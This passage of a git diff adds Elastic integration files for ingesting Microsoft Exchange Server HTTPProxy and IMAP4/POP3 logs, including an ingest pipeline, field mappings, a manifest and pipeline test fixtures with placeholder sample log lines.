changes: + - description: Fix missing Dashboard references + type: enhancement + link: https://github.com/elastic/integrations/pull/9325 +- version: "0.1.0" + changes: + - description: Initial release of the package + type: enhancement + link: https://github.com/elastic/integrations/pull/9197 diff --git a/packages/microsoft_exchange_server/data_stream/httpproxy/_dev/test/pipeline/test-common-config.yml b/packages/microsoft_exchange_server/data_stream/httpproxy/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..a06dda74051 --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/httpproxy/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,5 @@ +dynamic_fields: + "event.ingested": ".*" +fields: + tags: + - preserve_original_event diff --git a/packages/microsoft_exchange_server/data_stream/httpproxy/_dev/test/pipeline/test-httpproxy.log b/packages/microsoft_exchange_server/data_stream/httpproxy/_dev/test/pipeline/test-httpproxy.log new file mode 100644 index 00000000000..ba3975e6fbe --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/httpproxy/_dev/test/pipeline/test-httpproxy.log @@ -0,0 +1 @@ +2024-01-24T15:26:47.957Z,3422ea93-768f-4cd4-8b0c-578038deb0b2,15,1,2507,35,R:{750498CA-0EBD-4E7F-B2F6-377AD1BDD198}:20373;RT:Execute;CI:{FF8D5880-5A7A-4AF7-8DDA-8F662BD6BCB6}:155680117;CID:{FF8D5880-5A7A-4AF7-8DDA-8F662BD6BCB6},Mapi,mail.domain.tld,/mapi/emsmdb/,,Negotiate,true,DOMAIN\user,domain.tld,MailboxGuid~0aa89cf8-aa07-4103-8a1d-ca9e619f223e,Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.16731; Pro),10.12.13.14,Host123,200,200,,POST,Proxy,Host456.domain.tld,15.01.2507.000,CrossForest,MailboxGuidWithDomain,Database~a6c4dbb1-3265-4fbf-9dc6-754dffd67275~~2024-02-23T15:26:43,,,70,132,,,0,1,,0,,0,,0,0,,0,10,0,0,0,0,3,0,0,0,2,0,10,0,4,7,7,7,10,,?MailboxId=0e36a769-e2a9-4d1d-98df-80be2753326c@domain.tld,,BeginRequest=2024-01-24T15:26:47.947Z;CorrelationID=;ProxyState-Run=None;FEAuth=BEVersion-1942063563;BeginGetRequestStream=2024-01-24T15:26:47.953Z;OnRequestStreamReady=2024-01-24T15:26:47.953Z;BeginGetResponse=2024-01-24T15:26:47.953Z;OnResponseReady=2024-01-24T15:26:47.957Z;EndGetResponse=2024-01-24T15:26:47.957Z;ProxyState-Complete=ProxyResponseData;SharedCacheGuard=0;EndRequest=2024-01-24T15:26:47.957Z;,,,|RoutingDB:0cb2fd35-94c0-44de-9860-134d27654078,,,CafeV1 diff --git a/packages/microsoft_exchange_server/data_stream/httpproxy/_dev/test/pipeline/test-httpproxy.log-expected.json b/packages/microsoft_exchange_server/data_stream/httpproxy/_dev/test/pipeline/test-httpproxy.log-expected.json new file mode 100644 index 00000000000..55090d00c93 --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/httpproxy/_dev/test/pipeline/test-httpproxy.log-expected.json @@ -0,0 +1,94 @@ +{ + "expected": [ + { + "@timestamp": "2024-01-24T15:26:47.957Z", + "event": { + "ingested": "2024-03-06T14:46:17.645261012Z", + "original": "2024-01-24T15:26:47.957Z,3422ea93-768f-4cd4-8b0c-578038deb0b2,15,1,2507,35,R:{750498CA-0EBD-4E7F-B2F6-377AD1BDD198}:20373;RT:Execute;CI:{FF8D5880-5A7A-4AF7-8DDA-8F662BD6BCB6}:155680117;CID:{FF8D5880-5A7A-4AF7-8DDA-8F662BD6BCB6},Mapi,mail.domain.tld,/mapi/emsmdb/,,Negotiate,true,DOMAIN\\user,domain.tld,MailboxGuid~0aa89cf8-aa07-4103-8a1d-ca9e619f223e,Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.16731; Pro),10.12.13.14,Host123,200,200,,POST,Proxy,Host456.domain.tld,15.01.2507.000,CrossForest,MailboxGuidWithDomain,Database~a6c4dbb1-3265-4fbf-9dc6-754dffd67275~~2024-02-23T15:26:43,,,70,132,,,0,1,,0,,0,,0,0,,0,10,0,0,0,0,3,0,0,0,2,0,10,0,4,7,7,7,10,,?MailboxId=0e36a769-e2a9-4d1d-98df-80be2753326c@domain.tld,,BeginRequest=2024-01-24T15:26:47.947Z;CorrelationID=;ProxyState-Run=None;FEAuth=BEVersion-1942063563;BeginGetRequestStream=2024-01-24T15:26:47.953Z;OnRequestStreamReady=2024-01-24T15:26:47.953Z;BeginGetResponse=2024-01-24T15:26:47.953Z;OnResponseReady=2024-01-24T15:26:47.957Z;EndGetResponse=2024-01-24T15:26:47.957Z;ProxyState-Complete=ProxyResponseData;SharedCacheGuard=0;EndRequest=2024-01-24T15:26:47.957Z;,,,|RoutingDB:0cb2fd35-94c0-44de-9860-134d27654078,,,CafeV1" + }, + "http": { + "request": { + "bytes": 70, + "method": "POST" + }, + "response": { + "bytes": 132, + "status_code": 200 + } + }, + "message": "2024-01-24T15:26:47.957Z,3422ea93-768f-4cd4-8b0c-578038deb0b2,15,1,2507,35,R:{750498CA-0EBD-4E7F-B2F6-377AD1BDD198}:20373;RT:Execute;CI:{FF8D5880-5A7A-4AF7-8DDA-8F662BD6BCB6}:155680117;CID:{FF8D5880-5A7A-4AF7-8DDA-8F662BD6BCB6},Mapi,mail.domain.tld,/mapi/emsmdb/,,Negotiate,true,DOMAIN\\user,domain.tld,MailboxGuid~0aa89cf8-aa07-4103-8a1d-ca9e619f223e,Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.16731; Pro),10.12.13.14,Host123,200,200,,POST,Proxy,Host456.domain.tld,15.01.2507.000,CrossForest,MailboxGuidWithDomain,Database~a6c4dbb1-3265-4fbf-9dc6-754dffd67275~~2024-02-23T15:26:43,,,70,132,,,0,1,,0,,0,,0,0,,0,10,0,0,0,0,3,0,0,0,2,0,10,0,4,7,7,7,10,,?MailboxId=0e36a769-e2a9-4d1d-98df-80be2753326c@domain.tld,,BeginRequest=2024-01-24T15:26:47.947Z;CorrelationID=;ProxyState-Run=None;FEAuth=BEVersion-1942063563;BeginGetRequestStream=2024-01-24T15:26:47.953Z;OnRequestStreamReady=2024-01-24T15:26:47.953Z;BeginGetResponse=2024-01-24T15:26:47.953Z;OnResponseReady=2024-01-24T15:26:47.957Z;EndGetResponse=2024-01-24T15:26:47.957Z;ProxyState-Complete=ProxyResponseData;SharedCacheGuard=0;EndRequest=2024-01-24T15:26:47.957Z;,,,|RoutingDB:0cb2fd35-94c0-44de-9860-134d27654078,,,CafeV1", + "microsoft": { + "exchange": { + "activitycontextlifetime": 10, + "adlatency": 0, + "anchormailbox": "MailboxGuid~0aa89cf8-aa07-4103-8a1d-ca9e619f223e", + "authenticateduser": "DOMAIN\\user", + "authenticationtype": "Negotiate", + "backendcookie": "Database~a6c4dbb1-3265-4fbf-9dc6-754dffd67275~~2024-02-23T15:26:43", + "backendprocessinglatency": 3, + "backendreqinitlatency": 0, + "backendreqstreamlatency": 0, + "backendrespinitlatency": 0, + "backendrespstreamlatency": 0, + "backendstatus": 200, + "buildversion": 2507, + "calculatetargetbackendlatency": 1, + "clientipaddress": [ + "10.12.13.14" + ], + "clientreqstreamlatency": 0, + "clientrequestid": "R:{750498CA-0EBD-4E7F-B2F6-377AD1BDD198}:20373;RT:Execute;CI:{FF8D5880-5A7A-4AF7-8DDA-8F662BD6BCB6}:155680117;CID:{FF8D5880-5A7A-4AF7-8DDA-8F662BD6BCB6}", + "clientrespstreamlatency": 0, + "corelatency": 7, + "databaseguid": "|RoutingDB:0cb2fd35-94c0-44de-9860-134d27654078", + "genericinfo": "BeginRequest=2024-01-24T15:26:47.947Z;CorrelationID=;ProxyState-Run=None;FEAuth=BEVersion-1942063563;BeginGetRequestStream=2024-01-24T15:26:47.953Z;OnRequestStreamReady=2024-01-24T15:26:47.953Z;BeginGetResponse=2024-01-24T15:26:47.953Z;OnResponseReady=2024-01-24T15:26:47.957Z;EndGetResponse=2024-01-24T15:26:47.957Z;ProxyState-Complete=ProxyResponseData;SharedCacheGuard=0;EndRequest=2024-01-24T15:26:47.957Z;", + "handlercompletionlatency": 0, + "handlertomoduleswitchinglatency": 0, + "httppipelinelatency": 0, + "httpproxyoverhead": 7, + "isauthenticated": "true", + "kerberosauthheaderlatency": 2, + "logtype": "httpproxy", + "majorversion": 15, + "minorversion": 1, + "moduletohandlerswitchinglatency": 0, + "organization": "domain.tld", + "protocol": "Mapi", + "proxyaction": "Proxy", + "proxytime": 4, + "requesthandlerlatency": 10, + "requestid": "3422ea93-768f-4cd4-8b0c-578038deb0b2", + "revisionversion": 35, + "routinghint": "MailboxGuidWithDomain", + "routinglatency": 7, + "routingstatus": "CafeV1", + "routingtype": "CrossForest", + "targetserver": "Host456.domain.tld", + "targetserverversion": "15.01.2507.000", + "totalaccountforestlatency": 0, + "totalglslatency": 0, + "totalrequesttime": 10, + "totalresourceforestlatency": 0, + "totalsharedcachelatency": 0, + "urlhost": "mail.domain.tld", + "urlstem": "/mapi/emsmdb/" + } + }, + "observer": { + "hostname": "Host123" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "query": "?MailboxId=0e36a769-e2a9-4d1d-98df-80be2753326c@domain.tld" + }, + "user": { + "name": "user" + }, + "user_agent": { + "original": "Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.16731; Pro)" + } + } + ] +} \ No newline at end of file diff --git a/packages/microsoft_exchange_server/data_stream/httpproxy/agent/stream/filestream.yml.hbs b/packages/microsoft_exchange_server/data_stream/httpproxy/agent/stream/filestream.yml.hbs new file mode 100644 index 00000000000..9c5a9235ed8 --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/httpproxy/agent/stream/filestream.yml.hbs @@ -0,0 +1,17 @@ +paths: +{{#each paths as |path i|}} + - {{path}} +{{/each}} +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#each tags as |tag i|}} + - {{tag}} +{{/each}} +exclude_files: [".gz$"] +processors: + - add_locale: ~ +{{#if processors}} +{{processors}} +{{/if}} diff --git a/packages/microsoft_exchange_server/data_stream/httpproxy/elasticsearch/ingest_pipeline/default.yml b/packages/microsoft_exchange_server/data_stream/httpproxy/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..fd606c91250 --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/httpproxy/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,285 @@ +--- +description: Pipeline for processing Exchange Server HTTPProxy Logs +processors: +- drop: + if: "ctx.message =~ /^[^0-9]/ || ctx.message =~ /^#/" +- set: + field: event.original + copy_from: message +- csv: + field: event.original + ignore_failure: true + ignore_missing: true + target_fields: + - "@timestamp" + - microsoft.exchange.requestid + - microsoft.exchange.majorversion + - microsoft.exchange.minorversion + - microsoft.exchange.buildversion + - microsoft.exchange.revisionversion + - microsoft.exchange.clientrequestid + - microsoft.exchange.protocol + - microsoft.exchange.urlhost + - microsoft.exchange.urlstem + - microsoft.exchange.protocolaction + - microsoft.exchange.authenticationtype + - microsoft.exchange.isauthenticated + - microsoft.exchange.authenticateduser + - microsoft.exchange.organization + - microsoft.exchange.anchormailbox + - user_agent.original + - microsoft.exchange.clientipaddress + - observer.hostname + - http.response.status_code + - microsoft.exchange.backendstatus + - microsoft.exchange.errorcode + - http.request.method + - microsoft.exchange.proxyaction + - microsoft.exchange.targetserver + - microsoft.exchange.targetserverversion + - microsoft.exchange.routingtype + - microsoft.exchange.routinghint + - microsoft.exchange.backendcookie + - microsoft.exchange.serverlocatorhost + - microsoft.exchange.serverlocatorlatency + - http.request.bytes + - http.response.bytes + - microsoft.exchange.targetoutstandingrequests + - microsoft.exchange.authmoduleperfcontext + - microsoft.exchange.httppipelinelatency + - microsoft.exchange.calculatetargetbackendlatency + - microsoft.exchange.glslatencybreakup + - microsoft.exchange.totalglslatency + - microsoft.exchange.accountforestlatencybreakup + - microsoft.exchange.totalaccountforestlatency + - microsoft.exchange.resourceforestlatencybreakup + - microsoft.exchange.totalresourceforestlatency + - microsoft.exchange.adlatency + - microsoft.exchange.sharedcachelatencybreakup + - microsoft.exchange.totalsharedcachelatency + - microsoft.exchange.activitycontextlifetime + - microsoft.exchange.moduletohandlerswitchinglatency + - microsoft.exchange.clientreqstreamlatency + - microsoft.exchange.backendreqinitlatency + - microsoft.exchange.backendreqstreamlatency + - microsoft.exchange.backendprocessinglatency + - microsoft.exchange.backendrespinitlatency + - microsoft.exchange.backendrespstreamlatency + - microsoft.exchange.clientrespstreamlatency + - microsoft.exchange.kerberosauthheaderlatency + - microsoft.exchange.handlercompletionlatency + - microsoft.exchange.requesthandlerlatency + - microsoft.exchange.handlertomoduleswitchinglatency + - microsoft.exchange.proxytime + - microsoft.exchange.corelatency + - microsoft.exchange.routinglatency + - microsoft.exchange.httpproxyoverhead + - microsoft.exchange.totalrequesttime + - microsoft.exchange.routerefresherlatency + - url.query + - microsoft.exchange.backendgenericinfo + - microsoft.exchange.genericinfo + - microsoft.exchange.genericerrors + - microsoft.exchange.edgetraceid + - microsoft.exchange.databaseguid + - microsoft.exchange.useradobjectguid + - microsoft.exchange.partitionendpointlookuplatency + - microsoft.exchange.routingstatus +- set: + field: microsoft.exchange.logtype + value: httpproxy + ignore_empty_value: true + ignore_failure: true +- grok: + field: microsoft.exchange.authenticateduser + patterns: + - "%{DATA}\\\\%{NOTSPACE:user.name}" + ignore_failure: true + ignore_missing: true +- grok: + field: microsoft.exchange.clientipaddress + patterns: + - "^%{IP:microsoft.exchange.clientipaddress_external}%{SPACE}%{IP:microsoft.exchange.clientipaddress_internal}$" + ignore_failure: true + ignore_missing: true +- split: + field: microsoft.exchange.clientipaddress + separator: " " + ignore_failure: true + ignore_missing: true +- convert: + field: "http.request.bytes" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "http.response.bytes" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "http.response.status_code" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.adlatency" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.backendprocessinglatency" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.backendreqinitlatency" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.backendreqstreamlatency" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.backendrespinitlatency" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.backendrespstreamlatency" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.backendstatus" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.buildversion" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.calculatetargetbackendlatency" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.clientreqstreamlatency" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.clientrespstreamlatency" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.corelatency" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.handlercompletionlatency" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.handlertomoduleswitchinglatency" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.httppipelinelatency" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.kerberosauthheaderlatency" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.majorversion" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.minorversion" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.moduletohandlerswitchinglatency" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.requesthandlerlatency" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.revisionversion" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.routinglatency" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.totalaccountforestlatency" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.totalglslatency" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.totalrequesttime" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.totalresourceforestlatency" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.totalsharedcachelatency" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.activitycontextlifetime" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.httpproxyoverhead" + type: long + ignore_failure: true + ignore_missing: true +- convert: + field: "microsoft.exchange.proxytime" + type: long + ignore_failure: true + ignore_missing: true +- set: + field: event.ingested + copy_from: _ingest.timestamp + ignore_failure: true +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/microsoft_exchange_server/data_stream/httpproxy/fields/base-fields.yml b/packages/microsoft_exchange_server/data_stream/httpproxy/fields/base-fields.yml new file mode 100644 index 00000000000..7c798f4534c --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/httpproxy/fields/base-fields.yml @@ -0,0 +1,12 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/microsoft_exchange_server/data_stream/httpproxy/fields/ecs.yml b/packages/microsoft_exchange_server/data_stream/httpproxy/fields/ecs.yml new file mode 100644 index 00000000000..2b27b8981dd --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/httpproxy/fields/ecs.yml @@ -0,0 +1,20 @@ +- external: ecs + name: message +- external: ecs + name: http.response.status_code +- external: ecs + name: url.query +- external: ecs + name: http.request.method +- external: ecs + name: user_agent.original +- external: ecs + name: http.response.bytes +- external: ecs + name: http.request.bytes +- external: ecs + name: observer.hostname +- external: ecs + name: tags +- external: ecs + name: user.name diff --git a/packages/microsoft_exchange_server/data_stream/httpproxy/fields/fields.yml b/packages/microsoft_exchange_server/data_stream/httpproxy/fields/fields.yml new file mode 100644 index 00000000000..fff82215084 --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/httpproxy/fields/fields.yml @@ -0,0 +1,138 @@ +- name: microsoft.exchange.requestid + type: keyword +- name: microsoft.exchange.majorversion + type: long +- name: microsoft.exchange.minorversion + type: long +- name: microsoft.exchange.buildversion + type: long +- name: microsoft.exchange.revisionversion + type: long +- name: microsoft.exchange.clientrequestid + type: keyword +- name: microsoft.exchange.protocol + type: keyword +- name: microsoft.exchange.urlhost + type: keyword +- name: microsoft.exchange.urlstem + type: keyword +- name: microsoft.exchange.protocolaction + type: keyword +- name: microsoft.exchange.authenticationtype + type: keyword +- name: microsoft.exchange.isauthenticated + type: keyword +- name: microsoft.exchange.authenticateduser + type: keyword +- name: microsoft.exchange.organization + type: keyword +- name: microsoft.exchange.anchormailbox + type: keyword +- name: microsoft.exchange.clientipaddress + type: ip +- name: microsoft.exchange.backendstatus + type: long +- name: microsoft.exchange.errorcode + type: keyword +- name: microsoft.exchange.proxyaction + type: keyword +- name: microsoft.exchange.targetserver + type: keyword +- name: microsoft.exchange.targetserverversion + type: keyword +- name: microsoft.exchange.routingtype + type: keyword +- name: microsoft.exchange.routinghint + type: keyword +- name: microsoft.exchange.backendcookie + type: keyword +- name: microsoft.exchange.serverlocatorhost + type: keyword +- name: microsoft.exchange.serverlocatorlatency + type: long +- name: microsoft.exchange.targetoutstandingrequests + type: keyword +- name: microsoft.exchange.authmoduleperfcontext + type: keyword +- name: microsoft.exchange.httppipelinelatency + type: long +- name: microsoft.exchange.calculatetargetbackendlatency + type: long +- name: microsoft.exchange.glslatencybreakup + type: keyword +- name: microsoft.exchange.totalglslatency + type: long +- name: microsoft.exchange.accountforestlatencybreakup + type: keyword +- name: microsoft.exchange.totalaccountforestlatency + type: long +- name: microsoft.exchange.resourceforestlatencybreakup + type: keyword +- name: microsoft.exchange.totalresourceforestlatency + type: long +- name: microsoft.exchange.adlatency + type: long +- name: microsoft.exchange.sharedcachelatencybreakup + type: keyword +- name: microsoft.exchange.totalsharedcachelatency + type: long +- name: microsoft.exchange.activitycontextlifetime + type: long +- name: microsoft.exchange.moduletohandlerswitchinglatency + type: long +- name: microsoft.exchange.clientreqstreamlatency + type: long +- name: microsoft.exchange.backendreqinitlatency + type: long +- name: microsoft.exchange.backendreqstreamlatency + type: long +- name: microsoft.exchange.backendprocessinglatency + type: long +- name: microsoft.exchange.backendrespinitlatency + type: long +- name: microsoft.exchange.backendrespstreamlatency + type: long +- name: microsoft.exchange.clientrespstreamlatency + type: long +- name: microsoft.exchange.kerberosauthheaderlatency + type: long +- name: microsoft.exchange.handlercompletionlatency + type: long +- name: microsoft.exchange.requesthandlerlatency + type: long +- name: microsoft.exchange.handlertomoduleswitchinglatency + type: long +- name: microsoft.exchange.proxytime + type: long +- name: microsoft.exchange.corelatency + type: long +- name: microsoft.exchange.routinglatency + type: long +- name: microsoft.exchange.httpproxyoverhead + type: long +- name: microsoft.exchange.totalrequesttime + type: long +- name: microsoft.exchange.routerefresherlatency + type: long +- name: microsoft.exchange.backendgenericinfo + type: keyword +- name: microsoft.exchange.genericinfo + type: keyword +- name: microsoft.exchange.genericerrors + type: keyword +- name: microsoft.exchange.edgetraceid + type: keyword +- name: microsoft.exchange.databaseguid + type: keyword +- name: microsoft.exchange.useradobjectguid + type: keyword +- name: microsoft.exchange.partitionendpointlookuplatency + type: long +- name: microsoft.exchange.routingstatus + type: keyword +- name: microsoft.exchange.logtype + type: keyword +- name: microsoft.exchange.clientipaddress_external + type: ip +- name: microsoft.exchange.clientipaddress_internal + type: ip diff --git a/packages/microsoft_exchange_server/data_stream/httpproxy/manifest.yml b/packages/microsoft_exchange_server/data_stream/httpproxy/manifest.yml new file mode 100644 index 00000000000..b071ff6add2 --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/httpproxy/manifest.yml @@ -0,0 +1,29 @@ +title: "Exchange HTTPProxy" +type: logs +streams: + - input: filestream + title: Exchange HTTPProxy Logs + description: Collects HTTPProxy Logs + vars: + - name: paths + type: text + title: Paths + required: true + multi: true + show_user: true + default: + - "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\\*\\*.LOG" + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/fleet/current/elastic-agent-processor-configuration.html) for details. diff --git a/packages/microsoft_exchange_server/data_stream/imap4_pop3/_dev/test/pipeline/test-common-config.yml b/packages/microsoft_exchange_server/data_stream/imap4_pop3/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..a06dda74051 --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/imap4_pop3/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,5 @@ +dynamic_fields: + "event.ingested": ".*" +fields: + tags: + - preserve_original_event diff --git a/packages/microsoft_exchange_server/data_stream/imap4_pop3/_dev/test/pipeline/test-imap4-pop3.json b/packages/microsoft_exchange_server/data_stream/imap4_pop3/_dev/test/pipeline/test-imap4-pop3.json new file mode 100644 index 00000000000..6275f53cc8e --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/imap4_pop3/_dev/test/pipeline/test-imap4-pop3.json @@ -0,0 +1,52 @@ +{ + "events": [ + { + "log": { + "file": { + "path": "Pop3" + } + }, + "message": "2024-01-24T15:31:51.231Z,00000000000ABC12,2,1.2.3.4:110,10.11.12.13:12345,ccw.altitude,163,10,34,pass,*****,\"R=OK;Msg=\"\"Proxy:Host123.domain.tld:1995:SSL;ProxySuccess\"\";ActivityContextData=0cb2fd35-94c0-44de-9860-134d27654078\"," + }, + { + "log": { + "file": { + "path": "Pop3" + } + }, + "message": "2024-01-24T15:31:51.435Z,00000000000ABC12,1,1.2.3.4:110,10.11.12.13:12345,,0,0,0,CloseSession,,," + }, + { + "log": { + "file": { + "path": "Pop3" + } + }, + "message": "2024-01-24T15:31:51.067Z,00000000000ABC12,1,1.2.3.4:110,10.11.12.13:12345,ccw.altitude,1,17,5,user,ccw.altitude,R=OK," + }, + { + "log": { + "file": { + "path": "Imap4" + } + }, + "message": "2024-01-24T15:30:19.847Z,00000000000ABC12,2,1.2.3.4:143,10.11.12.13:65468,example123,118,31,34,authenticate,PLAIN,\"R=OK;Msg=\"\"Proxy:Host123.domain.tld:1993:SSL;ProxySuccess\"\";LiveIdAR=OK;ActivityContextData=0cb2fd35-94c0-44de-9860-134d27654078\"," + }, + { + "log": { + "file": { + "path": "Imap4" + } + }, + "message": "2024-01-24T15:30:18.896Z,00000000000ABC12,4,1.2.3.4:1993,10.11.12.13:25882,example123,15,18,262,examine,INBOX,\"R=OK;Rows=0;Recent=0;UidValidity=14;UidNext=2644;ActivityContextData=\"\"Dbl:ST.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=3,Dbl:RPC.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=10,I32:MB.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=13,F:MB.AL[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0.7692308,I32:RPC.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=13,Dbl:STCPU.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=15,I32:MAPI.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=266,I32:ROP.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=827177561,Dbl:MAPI.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=10,Dbl:EXR.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=3,Dbl:BudgUse.T[]=15.0116996765137\"\";Budget=\"\"Owner:Sid~S-1-2-34-1234567890-1234567890-123456789-123456~Imap~false,Conn:1,MaxConn:Unlimited,MaxBurst:3600000,Balance:3599988,Cutoff:Unlimited,RechargeRate:600000,Policy:GlobalThrottlingPolicy_0e36a769-e2a9-4d1d-98df-80be2753326c,IsServiceAccount:False,LiveTime:00:04:30.6615435\"\"\"," + }, + { + "log": { + "file": { + "path": "Imap4" + } + }, + "message": "2024-01-24T15:30:18.925Z,00000000000ABC12,5,1.2.3.4:1993,10.11.12.13:25882,example123,1,10,26,close,,\"R=OK;UidValidity=14;UidNext=2644;ActivityContextData=\"\"I32:MAPI.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=3,I32:MB.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0,F:MB.AL[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0,Dbl:MAPI.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0\"\";Budget=\"\"Owner:Sid~S-1-2-34-5678910111-1213141516-171819202-212223~Imap~false,Conn:1,MaxConn:Unlimited,MaxBurst:3600000,Balance:3599993,Cutoff:Unlimited,RechargeRate:600000,Policy:GlobalThrottlingPolicy_81f0fddf-6fcd-4e2e-9330-ca4a38f4057a,IsServiceAccount:False,LiveTime:00:04:30.6905655\"\"\"," + } + ] +} diff --git a/packages/microsoft_exchange_server/data_stream/imap4_pop3/_dev/test/pipeline/test-imap4-pop3.json-expected.json b/packages/microsoft_exchange_server/data_stream/imap4_pop3/_dev/test/pipeline/test-imap4-pop3.json-expected.json new file mode 100644 index 00000000000..85dbc75a6a1 --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/imap4_pop3/_dev/test/pipeline/test-imap4-pop3.json-expected.json @@ -0,0 +1,210 @@ +{ + "expected": [ + { + "@timestamp": "2024-01-24T15:31:51.231Z", + "event": { + "ingested": "2024-03-06T14:49:25.165868250Z", + "original": "2024-01-24T15:31:51.231Z,00000000000ABC12,2,1.2.3.4:110,10.11.12.13:12345,ccw.altitude,163,10,34,pass,*****,\"R=OK;Msg=\"\"Proxy:Host123.domain.tld:1995:SSL;ProxySuccess\"\";ActivityContextData=0cb2fd35-94c0-44de-9860-134d27654078\"," + }, + "log": { + "file": { + "path": "Pop3" + } + }, + "message": "2024-01-24T15:31:51.231Z,00000000000ABC12,2,1.2.3.4:110,10.11.12.13:12345,ccw.altitude,163,10,34,pass,*****,\"R=OK;Msg=\"\"Proxy:Host123.domain.tld:1995:SSL;ProxySuccess\"\";ActivityContextData=0cb2fd35-94c0-44de-9860-134d27654078\",", + "microsoft": { + "exchange": { + "cip": "10.11.12.13:12345", + "command": "pass", + "context": "R=OK;Msg=\"Proxy:Host123.domain.tld:1995:SSL;ProxySuccess\";ActivityContextData=0cb2fd35-94c0-44de-9860-134d27654078", + "duration": 163, + "logtype": "pop3", + "parameters": "*****", + "rpsize": 34, + "rqsize": 10, + "seqnumber": 2, + "sessionid": "00000000000ABC12", + "sip": "1.2.3.4:110", + "user": "ccw.altitude" + } + }, + "source": { + "ip": "10.11.12.13" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-24T15:31:51.435Z", + "event": { + "ingested": "2024-03-06T14:49:25.165884866Z", + "original": "2024-01-24T15:31:51.435Z,00000000000ABC12,1,1.2.3.4:110,10.11.12.13:12345,,0,0,0,CloseSession,,," + }, + "log": { + "file": { + "path": "Pop3" + } + }, + "message": 